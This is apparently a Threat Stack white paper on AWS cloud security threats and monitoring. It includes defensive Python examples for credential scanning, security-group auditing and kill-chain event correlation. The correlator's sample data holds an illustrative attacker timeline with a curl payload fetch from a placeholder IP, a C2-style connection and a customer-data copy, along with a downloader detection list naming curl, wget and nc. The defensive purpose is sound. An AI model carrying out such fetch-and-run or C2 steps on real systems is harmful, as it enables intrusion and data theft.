Implementing high-velocity security best practices.


A STEP-BY-STEP GUIDE TO RUNNING SECURE, COMPLIANT AND OPERATIONALLY EFFICIENT IN AWS.

THE STATE OF CLOUD SECURITY

Infrastructure has changed

It is no surprise that as more businesses move to the cloud, Infrastructure-as-a-Service (IaaS) is growing rapidly along with it. IaaS allows businesses to improve efficiency, reduce risk, tighten controls and lower costs by providing a new, elastic infrastructure that grows and shrinks with the needs of the business. IaaS provides the servers, storage and networking you need without your owning the hardware, and because this infrastructure is consistent and uniform in design, deployment, upgrades and maintenance are much easier to manage. Amazon Web Services (AWS), the leader in IaaS, offers one of the most flexible and highly scalable cloud-computing platforms on the market today. Its popularity and growing user base were underscored when it surpassed 1 million active customers in November 2014.[1] However, the security required for cloud computing demands a much more sophisticated, “hands off” approach than that of the traditional on-premises data center. For all the benefits the cloud has to offer, there is still a lot of uncertainty around:
• The level of security provided by cloud vendors
• How to identify and report on lost or stolen data
• The best way to gain visibility into who is accessing cloud data and applications

Figure 1: Gartner Cloud Security Survey. Question asked: “What is your No. 1 issue with security and privacy in public cloud?” (vertical axis: number of responders, 0 to 30). Response options:
• Insider attack by cloud provider administrators
• Multitenant infrastructure means competitors might be able to see my workloads or data
• Data may be lost if the cloud service crashes
• The cloud service may be unavailable for extended periods
• Data may be lost if the cloud provider goes out of business
• Unclear liability if there is an attack and data loss
• Lack of confidence in the cloud provider’s security capabilities
• Lack of visibility into who is accessing your data and applications
• Governments may have access to my data without my consent
• Clouds are attractive targets for hackers; they concentrate risk


NEW SECURITY CHALLENGES ABOUND

How do you implement security controls in the cloud when the network edge has been replaced by a virtual perimeter, so there is no longer a single egress point at which to deploy traditional hardware appliances? Cloud-based infrastructure requires modern security and a software-only approach. Traditional intrusion detection/prevention systems (IDS/IPS), unified threat management (UTM) appliances and next-generation firewalls that require physical access to the network will not work in this environment. Amazon provides and secures the basic infrastructure (locks on data centers, restricted access to hardware, etc.), but it is your responsibility to secure what you run on it: the operating systems, applications, identities and data. Many customers today store critical personal information, including healthcare and financial details, in files or databases on specific virtual machines. In addition to sensitive customer data, many files contain intellectual property such as proprietary designs or processes. Given the amount of sensitive data saved in the cloud, continuous security monitoring, together with the ability to put that data in context so it yields insight into breaches and potential threats, has become essential.

THREATS ARE REAL

As recent news headlines tell us, efforts to protect the cloud from attacks often fail. After attackers compromised the AWS account of Code Spaces, a cloud-based hosting platform for software development and collaboration, the company was forced out of business. Within 12 hours, its Apache Subversion repositories, Elastic Block Store volumes and nearly all of its virtual machines were destroyed. By the time the company reclaimed its control panel, the attackers had created alternative AWS logins, weakening the security of the account further. At that point, the company decided its best course of action was to shut down and help its customers migrate any recoverable data to other services.[2] One More Cloud, another hosted provider, fared better. The company had a mislabeled, old API key that a third-party collaborator may have had access to. For one week, the company struggled to regain control of its dashboard and recover its customer accounts. One More Cloud remains operational today.[3] More recently, the Ashley Madison data breach demonstrated the danger of storing AWS tokens and SSL certificates in source files in the cloud without sufficient monitoring; those credentials gave the attackers free rein over the online service and its data.[4] These examples are cautionary tales of the dangers of running fast in the cloud without the proper security measures in place.


UNDERSTANDING THE MOST COMMON THREATS

The first step to ensuring your company doesn’t meet the same fate as Code Spaces is to understand the most common threats to your cloud infrastructure:

DATA LOSS / INSIDER THREATS

Without proper vigilance and insight, suspicious behavior such as accessing or copying data without permission may go unnoticed. Often the bad actors are inside the organization and are missed by existing, outward-facing security solutions. In addition to customer records, cloud instances sometimes contain copies of internal configuration. These might include passwords, certificates and encryption keys, the many “keys to the kingdom.” The data breach at Ashley Madison, for example, revealed AWS credentials hard-coded into various files. The presence of AWS tokens may have allowed those responsible for the breach to access all of Ashley Madison’s digital assets, including emails and other sensitive documents.[5] To catch this, you need a record of deep system activity (logins, processes, network connections and file changes) detailed enough to trigger alerts on insider activity, and you need to keep long-lived credentials out of files on the instances in the first place.
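As an added example (not Threat Stack's own tooling), the following Python script scans a set of files for hard-coded AWS credentials, the kind of pre-commit or periodic check that would have surfaced the Ashley Madison tokens before an attacker did. The formats it matches are AWS's real ones (20-character access key IDs beginning AKIA or ASIA, and a 40-character secret key sitting next to a variable named like aws_secret_access_key); the file contents are constructed for the example, using AWS's documented example credentials plus an invented ASIA key.

```python
"""Scan text files for hard-coded AWS credentials.

Added example, not Threat Stack code. SAMPLE_FILES is constructed:
the AKIA/secret pair is AWS's documented example credential and the
ASIA key is invented for the example.
"""
import re

# Long-term user keys start with AKIA, temporary STS keys with ASIA;
# both are 20 upper-case alphanumerics in total.
ACCESS_KEY_RE = re.compile(r"\b((?:AKIA|ASIA)[0-9A-Z]{16})\b")

# Secret keys are 40 base64-style characters. On their own they look like
# any random token, so we only flag one that is assigned to a variable
# whose name says "aws secret access key" (case-insensitive, any separator).
SECRET_KEY_RE = re.compile(
    r"(?i)aws[_\-]?secret[_\-]?access[_\-]?key['\"]?\s*[:=]\s*['\"]?([A-Za-z0-9/+=]{40})\b"
)


def redact(value):
    """Keep just enough of a secret to correlate it with IAM, never the whole thing."""
    return value[:4] + "..." + value[-4:]


def scan_text(name, text):
    """Return (file, line_no, kind, redacted_value) for every credential found."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for m in ACCESS_KEY_RE.finditer(line):
            findings.append((name, line_no, "access_key_id", redact(m.group(1))))
        for m in SECRET_KEY_RE.finditer(line):
            findings.append((name, line_no, "secret_access_key", redact(m.group(1))))
    return findings


def scan_files(files):
    """files: mapping of path -> contents (read them from disk in real use)."""
    out = []
    for path, text in files.items():
        out.extend(scan_text(path, text))
    return out


# Constructed sample inputs: an ini-style config with a full key pair, a PHP
# source file with a temporary key baked in, and a clean file that must not fire.
SAMPLE_FILES = {
    "config/aws.ini": (
        "[default]\n"
        "aws_access_key_id = AKIAIOSFODNN7EXAMPLE\n"
        "aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\n"
    ),
    "app/s3.php": "<?php $client = S3Client::factory(['key' => 'ASIAEXAMPLE1234567AB']);\n",
    "README.md": "Credentials are loaded from the instance profile, never from this repo.\n",
}

if __name__ == "__main__":
    for path, line_no, kind, value in scan_files(SAMPLE_FILES):
        print(f"{path}:{line_no}: {kind} {value}")
```

Run it as a pre-commit hook over staged files and fail the commit on any finding; the redacted prefix and suffix are enough to locate and rotate the key in IAM without copying the secret into the alert itself.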

EXTERNAL THREATS / ZERO-DAY ATTACKS / ADVANCED PERSISTENT THREATS

In addition to internal threats, there are external threats as well. However, the biggest external threat today might not be Chinese hackers but people standing up boxes quickly and misconfiguring those virtual machines. Another threat is the side-channel attack. A side channel is typically built by measuring some observable hardware state, such as cache timing, and this can also be carried out in the cloud by placing an attacking VM on the same physical machine as a target VM. One such attack works by flushing lines of the shared processor cache, letting the target VM run, and then timing accesses to see which lines the target reloaded; the pattern of reloaded lines reveals secret-dependent memory accesses, such as the bits of a cryptographic key. Other attacks target the overall integrity of the machine image in the cloud.

An open port or an unpatched privilege-escalation path can also expose data in the cloud to malware. According to Symantec, only about one in five malware samples terminates when it finds itself running on a virtual machine, meaning most malware today will run unhindered in the cloud.[6] In 2009, some AWS servers hosted a controller for the Zeus banking-Trojan botnet before they were shut down.[7] Some threats leverage previously unknown vulnerabilities, known as zero-days, or launch multiple phases of attack over time in what is known as an Advanced Persistent Threat (APT). A recent Ponemon report finds that diminished brand or reputation due to an APT attack could cost an organization an estimated $9.4 million.[8]
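To make the misconfiguration point concrete, here is an added example (not from the page or from Threat Stack) that audits security group rules for ports open to the entire Internet, the “wide open security groups” an attacker looks for first. It runs over a constructed document in the shape of an EC2 DescribeSecurityGroups response (what boto3's ec2.describe_security_groups() returns); the group IDs, names and the list of high-risk ports are assumptions for the example.

```python
"""Audit EC2 security groups for inbound rules open to the whole Internet.

Added example, not Threat Stack code. SAMPLE_DOC is constructed in the
shape of an EC2 DescribeSecurityGroups response; in practice you would
feed this function boto3's ec2.describe_security_groups() output.
"""

ANY_V4, ANY_V6 = "0.0.0.0/0", "::/0"

# Assumed for the example: ports that should essentially never be reachable
# from arbitrary Internet addresses on a workload.
HIGH_RISK_PORTS = {22: "ssh", 3389: "rdp", 3306: "mysql",
                   5432: "postgres", 6379: "redis", 27017: "mongodb"}


def port_range(perm):
    """(from, to) covered by a rule; IpProtocol "-1" means every port of every protocol."""
    if perm.get("IpProtocol") == "-1":
        return (0, 65535)
    return (perm.get("FromPort", 0), perm.get("ToPort", 65535))


def open_to_world(perm):
    """True if any IPv4 or IPv6 range on the rule is the unrestricted CIDR."""
    cidrs = [r.get("CidrIp") for r in perm.get("IpRanges", [])]
    cidrs += [r.get("CidrIpv6") for r in perm.get("Ipv6Ranges", [])]
    return any(c in (ANY_V4, ANY_V6) for c in cidrs)


def audit_security_groups(doc):
    """Return one finding dict per world-open inbound rule, rated by severity."""
    findings = []
    for sg in doc.get("SecurityGroups", []):
        for perm in sg.get("IpPermissions", []):
            if not open_to_world(perm):
                continue
            lo, hi = port_range(perm)
            risky = [name for port, name in HIGH_RISK_PORTS.items() if lo <= port <= hi]
            if (lo, hi) == (0, 65535):
                severity = "critical"   # everything exposed
            elif risky:
                severity = "high"       # admin or database port exposed
            else:
                severity = "info"       # e.g. 443 on a public web tier: review, not panic
            findings.append({
                "group": sg["GroupId"], "name": sg.get("GroupName"),
                "protocol": perm.get("IpProtocol"), "ports": (lo, hi),
                "risky_services": risky, "severity": severity,
            })
    return findings


# Constructed sample: a web tier that legitimately serves 443, a database
# tier that someone opened SSH on, and a legacy group allowing all traffic.
SAMPLE_DOC = {"SecurityGroups": [
    {"GroupId": "sg-web", "GroupName": "web-tier", "IpPermissions": [
        {"IpProtocol": "tcp", "FromPort": 443, "ToPort": 443,
         "IpRanges": [{"CidrIp": "0.0.0.0/0"}], "Ipv6Ranges": []}]},
    {"GroupId": "sg-db", "GroupName": "db-tier", "IpPermissions": [
        {"IpProtocol": "tcp", "FromPort": 3306, "ToPort": 3306,
         "IpRanges": [{"CidrIp": "10.0.0.0/16"}], "Ipv6Ranges": []},
        {"IpProtocol": "tcp", "FromPort": 22, "ToPort": 22,
         "IpRanges": [{"CidrIp": "0.0.0.0/0"}], "Ipv6Ranges": []}]},
    {"GroupId": "sg-legacy", "GroupName": "legacy-all", "IpPermissions": [
        {"IpProtocol": "-1", "IpRanges": [], "Ipv6Ranges": [{"CidrIpv6": "::/0"}]}]},
]}

if __name__ == "__main__":
    for f in audit_security_groups(SAMPLE_DOC):
        print(f"[{f['severity']}] {f['group']} ({f['name']}) {f['protocol']} "
              f"{f['ports'][0]}-{f['ports'][1]} risky={f['risky_services']}")
```

Note that the IPv6 case matters: a rule that only lists ::/0 is just as open as 0.0.0.0/0, and audits that check IpRanges alone will miss it.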


A 10-STEP PLAN TO BETTER CLOUD SECURITY

How can you stay out of the “cloud security breach” headlines? We’ve compiled a checklist of best practices and key considerations to guard against these attacks in the cloud.

1 INTEGRATE SECURITY INTO YOUR CONTINUOUS DEPLOYMENT

Embrace security and DevOps best practices by leveraging the configuration management tools (Chef, Puppet, Ansible, Salt) that already automate software installation, updates and patches. Make sure your software-defined security can be deployed through the same tools, so that security coverage is part of every build rather than an afterthought.

2 SCALE WITHOUT HARDWARE RESTRAINTS

As you spin boxes up and down in the cloud, you need security that scales with your business with no additional hardware, deployed with your Amazon Machine Images (AMIs). You need a security solution that knows AWS thoroughly, not one ported into the cloud from an appliance. Preferably, the solution integrates with AWS and auto-scales along with it.

3 DEPLOY INTELLIGENT SECURITY THAT RESPONDS TO CHANGE

As threats evolve, your protection needs to be agile and (to prevent false positives) contextual. Signature-based protection is static: it filters only what is already known, and it is only effective while its signatures are updated and current. A better approach is a behavior-based solution capable of identifying new or anomalous activity, so you can stay on top of zero-day attacks and new behaviors that threaten your security posture.

4 GO BEYOND LOGS

While logs are essential, they often provide only a narrow view of what is going on. It is one thing to see who is entering and leaving the building and quite another to know what they are doing once inside. Typical network-based intrusion detection (NIDS) does not give you much to work with after the compromise, and its ability to identify the behavior leading up to an attack is limited.

5 IDENTIFY SUSPICIOUS USER BEHAVIOR

It is important to catch suspicious user behaviors early. For example, developers sometimes copy files from a production server without meaning to. You need to be informed when such activity occurs so you can take corrective action.

6 MAINTAIN A POSTURE OF CONTINUOUS COVERAGE

To stay on top of your ever-changing AWS environment, you need continuous data, not periodic polling. Specifically, you need detection at every stage of the kill chain of a compromise so that you can stop the bad activity before it causes too much damage.

7 TAKE AN INSIDE-OUT PERSPECTIVE

If you do not know what is happening on a host or workload, you need more knowledge from more sources than an IDS log. For example, you need to know more than the fact that a certain packet went out over the wire. To determine an appropriate response, you need a solution that shows you specific events, over time, on specific servers.

8 PROTECT AGAINST THE INSIDER THREAT

Should an incident occur, it is important to understand the bad actors, whether internal or external. What are the unauthorized process connections? Were there any unauthorized installs? Who has been accessing or copying key files? Prior to the compromise, were there abnormal login attempts and failures? Unauthorized external connections? Where are unauthorized commands being run? To make fact-based judgments you need a trail of logins, processes, network activity and file changes that answers the who, what, where, when and why.

9 GET AN EARLY WARNING ABOUT ZERO-DAY THREATS

Zero-day attacks are best detected through behavioral analysis and heuristics. Understanding how different events, taken together, might produce an undesirable result is critical to security today. Behavioral analysis can also be used to identify internal threats. For that, you need historical data for both current and transient instances across your AWS infrastructure.

10 DEFEND LIKE AN ATTACKER

Apply the Cyber Kill Chain® to your internal security process to remediate threats before they compromise your security and data.


DEFEND LIKE AN ATTACKER: APPLY THE CYBER KILL CHAIN®

Before you solve security in the cloud, you first have to understand how attackers work. You need a solution that maps to and addresses the attack vectors of a breach. You need to think like the bad guys to defeat them.

1 RECONNAISSANCE
Get An Early Warning: scanning activity; abnormal login attempts/failures; wide open security groups

2 WEAPONIZATION / 3 DELIVERY
Uncover Zero-Day Exploits: launching new processes or kernel modules; user session information; process stops

4 EXPLOITATION
Recognize Unauthorized Actions: escalation of user privileges; unauthorized installs; new users added/deleted; suspicious commands; changes to security groups

5 INSTALLATION / 6 COMMAND & CONTROL
Detect Advanced Persistent Threats: external connections for command and control; user session information; process stops

7 ACTION ON OBJECTIVES
Verify Data Is Safe: copying of customer/personal data; copying of intellectual property; copying of internal configuration, passwords, certs and keys
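The following Python example is added here (it is not Threat Stack code) to show how step 8 of the plan above, a trail of logins, processes, network activity and file changes, and the kill chain detection table fit together: each host event is mapped to a kill chain phase, events are grouped by host and source address, and a session is alerted only when it progresses through several phases, so a lone sudo by an administrator does not fire. The event records, host, addresses, sensitive paths and internal-network prefixes are all constructed assumptions for the example.

```python
"""Correlate host events onto Cyber Kill Chain phases and alert on sessions
that advance through several of them.

Added example, not Threat Stack code. Event records, hosts, addresses and
the path/network lists below are constructed for illustration.
"""
from collections import defaultdict

# Kill chain phases in order; a session's depth is the furthest one seen.
PHASES = ["reconnaissance", "delivery", "exploitation",
          "command_control", "actions_on_objectives"]

# Assumed for the example: where sensitive data lives, what counts as
# internal address space (RFC 1918, simplified to string prefixes), which
# commands pull tooling onto a box, and how many failed logins is a probe.
SENSITIVE_PATHS = ("/srv/data/", "/etc/shadow", "/home/deploy/.aws/")
INTERNAL_NETS = ("10.", "192.168.", "172.16.")
DOWNLOADERS = ("wget", "curl", "nc")
FAILED_LOGIN_THRESHOLD = 3


def classify(event, failed_logins_from_src):
    """Return the kill chain phase an event maps to, or None if it looks benign."""
    kind, detail = event["type"], event["detail"]
    if kind == "login_failed" and failed_logins_from_src >= FAILED_LOGIN_THRESHOLD:
        return "reconnaissance"            # password guessing / scanning
    if kind == "kernel_module_load":
        return "delivery"
    if kind == "process_start" and detail.split()[0] in DOWNLOADERS:
        return "delivery"                  # payload being fetched
    if kind in ("privilege_escalation", "new_user",
                "package_install", "security_group_change"):
        return "exploitation"              # unauthorized actions
    if kind == "net_connect" and not detail.startswith(INTERNAL_NETS):
        return "command_control"           # external connection, possible C2
    if kind == "file_copy" and detail.startswith(SENSITIVE_PATHS):
        return "actions_on_objectives"     # data leaving its home
    return None


def correlate(events, min_phases=3):
    """Group events by (host, source address); flag sessions spanning >= min_phases."""
    failed = defaultdict(int)
    sessions = defaultdict(lambda: {"phases": [], "timeline": []})
    for ev in sorted(events, key=lambda e: e["ts"]):
        key = (ev["host"], ev["src"])
        if ev["type"] == "login_failed":
            failed[key] += 1
        phase = classify(ev, failed[key])
        if phase is None:
            continue
        session = sessions[key]
        if phase not in session["phases"]:
            session["phases"].append(phase)
        session["timeline"].append((ev["ts"], phase, ev["type"], ev["detail"]))

    report = {}
    for key, session in sessions.items():
        report[key] = {
            "phases": session["phases"],
            "furthest_phase": max(session["phases"], key=PHASES.index),
            "alert": len(session["phases"]) >= min_phases,
            "timeline": session["timeline"],
        }
    return report


def _ev(ts, src, kind, detail, host="web-1"):
    return {"ts": ts, "host": host, "src": src, "type": kind, "detail": detail}


# Constructed sample: an intrusion from 203.0.113.9 that walks the whole chain,
# and a legitimate admin session from a bastion host at 10.0.1.5.
ATTACKER, ADMIN = "203.0.113.9", "10.0.1.5"
SAMPLE_EVENTS = [
    _ev(100, ATTACKER, "login_failed", "deploy"),
    _ev(101, ATTACKER, "login_failed", "deploy"),
    _ev(102, ATTACKER, "login_failed", "deploy"),
    _ev(103, ATTACKER, "login_failed", "deploy"),
    _ev(110, ATTACKER, "login_success", "deploy"),
    _ev(120, ATTACKER, "process_start", "curl -sO http://198.51.100.7/drop.sh"),
    _ev(125, ATTACKER, "privilege_escalation", "sudo -i"),
    _ev(130, ATTACKER, "new_user", "svc_backup"),
    _ev(140, ATTACKER, "net_connect", "198.51.100.7:4444"),
    _ev(150, ATTACKER, "file_copy", "/srv/data/customers.csv -> /tmp/.x/c.tgz"),
    _ev(200, ADMIN, "login_success", "alice"),
    _ev(201, ADMIN, "process_start", "tail -f /var/log/nginx/access.log"),
    _ev(202, ADMIN, "net_connect", "10.0.2.10:5432"),
    _ev(210, ADMIN, "privilege_escalation", "sudo systemctl restart nginx"),
]

if __name__ == "__main__":
    for (host, src), r in correlate(SAMPLE_EVENTS).items():
        flag = "ALERT" if r["alert"] else "ok"
        print(f"{flag:5} {host} from {src}: reached {r['furthest_phase']} via {r['phases']}")
```

Keying on the source address rather than the login session is what lets the pre-authentication failures be tied to the later interactive activity; the timeline kept per key is the replayable record of the who, what, where and when that step 8 asks for.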


A SOLUTION BUILT IN AWS TO SERVE AWS

A smarter approach to security in the cloud starts with a solution that auto-scales to meet the demands of elastic infrastructure, supports thousands of instances and provides continuous coverage so you can scale with confidence. Threat Stack arms AWS customers with unique visibility into the processes, users and file activity within your infrastructure. Agents monitor all the activity associated with your servers and provide the full details and context that lead to actionable insights around workload security. Threat Stack surfaces previously undiscovered or overlooked information to give you useful alerts and actionable recommendations.


HOW DOES THREAT STACK WORK?

Our lightweight agent installs in the user space of the Linux operating system. It deploys in minutes using your favorite automation software (Chef, Puppet or Ansible), so security is no longer the bottleneck for operational efficiency. Workload security begins the moment the agent is deployed.

By residing at the infrastructure level, Threat Stack agents are optimally positioned to oversee system activity and record activity history. Running an agent on the system itself means they capture the deep information that agentless security solutions simply cannot provide. Data from the underlying Linux kernel is the ultimate authority on exactly what is happening in your cloud infrastructure. Threat Stack constantly watches and records deep system activity around logins, processes and file changes to ensure that nothing out of the ordinary happens without your knowledge. The Threat Stack agent pulls that data from the Linux kernel file system and adds metadata to each event it collects. The data is communicated securely to our analytics backend, where we get to work, peeling back the onion to discover any suspicious activity. Threat Stack then brings that rich, contextual data to your fingertips, along with intelligent, security-relevant analytics computed by the backend.

Figure 2: Threat Stack continuous security monitoring for your cloud.

HOW IS THREAT STACK DIFFERENT FROM SIEM?

Traditional SIEMs aggregate log data and apply signatures to pull out the log entries that could be the basis for alerts. Threat Stack also aggregates events, but differs from a SIEM by storing all events and providing rich context for your analysis.

In the world of the auto-scaling cloud, machines appear and disappear. Sometimes you need to look back to reconstruct the story of what happened. Our “User Session Tracking” feature enables you to rewind, zoom in and play back any user’s actions at any point in time, even if the machine no longer exists. Events can be color-coded for easy reference, and our source and destination port tracking lets you follow a user throughout your network, including through jump hosts. Threat Stack is built to handle the scale and processing power needed to retain this kind of audit history, taking care of the analytics and data retention for you.

Another advantage of having all that historical data is that, in the event of a compromise, Threat Stack allows you to investigate what was used for the exploit. Similarly, if an employee leaves the company, you can go back and see what, if anything, happened leading up to that departure.

Once deployed, Threat Stack lets you focus on your full-time job, knowing that it auto-scales with your environment to make sure you are always covered. It is the perfect security solution for organizations that embrace DevOps in order to rapidly improve their applications and services.


SCALE YOUR BUSINESS WITH CONFIDENCE

Infrastructure-as-a-Service (IaaS) is growing rapidly, but cloud computing requires much more sophisticated security than traditional perimeter-based computing. Cloud-based infrastructure requires modern security and a software-only approach. While Amazon provides and secures the basic infrastructure (locks on data centers, restricted access to hardware, etc.), it is your responsibility to secure what runs on it.

Today the most common threats to your cloud infrastructure include data loss, insider threats, external threats, zero-day attacks and Advanced Persistent Threats (APTs). Keeping data secure in the cloud requires continuous yet agile monitoring. Also essential is the ability to put data in context so it provides insight into breaches and potential threats.

Threat Stack agents are optimally positioned to oversee system activity and record activity history. Like a SIEM, Threat Stack aggregates events, but it also stores all events to provide richer context for your threat analysis. This enables you to replay events, even from machines that no longer exist.

Threat Stack understands that no two companies running in AWS are exactly alike. We have designed our service offerings to provide the ultimate in flexibility when selecting a continuous security monitoring solution for your organization. Choose from three application packages (basic, advanced, pro) based on your needs and feature set. Next, select a storage option, offered in 2-, 7-, 10-, 15- and 30-day data retention periods. Finally, decide whether you want to manage the service yourself or put Threat Stack’s team of experts to work for you by adding our managed security service, Oversight. Whether you are a small, early-stage startup, an established fast-growing SaaS brand, or a large enterprise transitioning to the cloud, Threat Stack has you covered every step of the way so you can scale with confidence.

TO LEARN MORE OR START A FREE TRIAL, visit ThreatStack.com

[1] http://www.zdnet.com/article/aws-with-more-than-1-million-active-customers-were-your-stack/
[2] http://www.pcworld.com/article/2365602/hacker-puts-full-redundancy-codehosting-firm-out-of-business.html
[3] http://www.information-age.com/technology/cloud-and-virtualisation/123458406/catastrophe-cloud-what-aws-hacks-mean-cloud-providers
[4] https://blog.gaborszathmari.me/2015/09/07/credentials-in-the-ashley-madison-sources/
[5] http://www.pcworld.com/article/2981226/credentials-stored-in-ashley-madisons-source-code-might-have-helped-attackers.html
[6] http://www.symantec.com/connect/blogs/does-malware-still-detect-virtual-machines
[7] https://aws.amazon.com/security/security-bulletins/zeus-botnet-controller/
[8] https://securityintelligence.com/media/2014-ponemon-study-economic-impact-advanced-persistent-threats-apts/
